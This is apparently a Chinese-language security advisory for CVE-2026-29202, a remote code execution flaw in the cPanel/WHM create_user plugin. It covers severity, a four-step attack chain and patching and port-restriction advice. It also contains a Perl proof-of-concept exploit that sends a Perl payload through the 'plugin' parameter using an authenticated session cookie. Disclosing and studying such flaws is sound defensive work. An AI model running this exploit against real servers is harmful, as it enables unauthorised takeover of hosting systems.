CVE-2026-29202 cPanel create_user插件RCE漏洞

漏洞信息

漏洞编号

CVE-2026-29202

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

cPanel / WHM

漏洞概述

cPanel/WHM的create_user插件由于plugin参数输入验证不足，允许攻击者利用已认证账户执行任意Perl代码，导致服务器被完全控制。

技术细节

该漏洞位于cPanel/WHM的create_user插件处理逻辑中。由于未对传入的plugin参数实施严格的过滤机制，攻击者可注入恶意Perl代码。当系统处理该参数时，会将其作为动态代码执行。鉴于CVSS评分8.8及攻击向量AV:N/AC:L/PR:L，攻击者仅需低权限账户即可通过网络触发漏洞，无需用户交互，从而获取系统用户权限，严重威胁服务器的机密性、完整性和可用性。

攻击链分析

STEP 1

1. 初始访问

攻击者获取cPanel/WHM的低权限账户凭证。

STEP 2

2. 漏洞利用

攻击者向create_user插件接口发送特制的HTTP POST请求，在plugin参数中注入恶意Perl代码。

STEP 3

3. 代码执行

服务器端未经验证直接处理plugin参数，导致恶意Perl代码在系统用户权限下执行。

STEP 4

4. 系统控制

攻击者利用执行的系统命令建立后门、窃取数据或进一步提权，完全控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/perl
# PoC for CVE-2026-29202
# Description: Exploits insufficient input validation in the 'plugin' parameter
# Usage: perl exploit.pl <target_url> <session_cookie>

use LWP::UserAgent;
use strict;

my $target = $ARGV[0] || die "Target required\n";
my $cookie = $ARGV[1] || die "Session cookie required\n";

my $ua = LWP::UserAgent->new();
$ua->cookie_jar({});
$ua->default_header('Cookie' => $cookie);

# Vulnerable endpoint
my $url = "$target/frontend/paper_lantern/create_user/index.live.php";

# Malicious Perl payload to execute 'id' command
my $payload = 'system("id")';

my $response = $ua->post(
    $url,
    Content_Type => 'application/x-www-form-urlencoded',
    Content => [
        'plugin' => $payload,
        'create' => 1
    ]
);

if ($response->is_success) {
    print "[+] Request sent. Check output for command execution results.\n";
    print $response->content;
} else {
    print "[-] Exploit failed: " . $response->status_line . "\n";
}

影响范围

cPanel & WHM versions prior to security update released on May 08, 2026

防御指南

临时缓解措施

建议立即应用官方提供的2026年5月8日安全更新。在无法立即修补的情况下，应严格限制对cPanel管理端口（2083/2087）的网络访问，仅允许可信IP连接，并加强对系统异常进程的监控。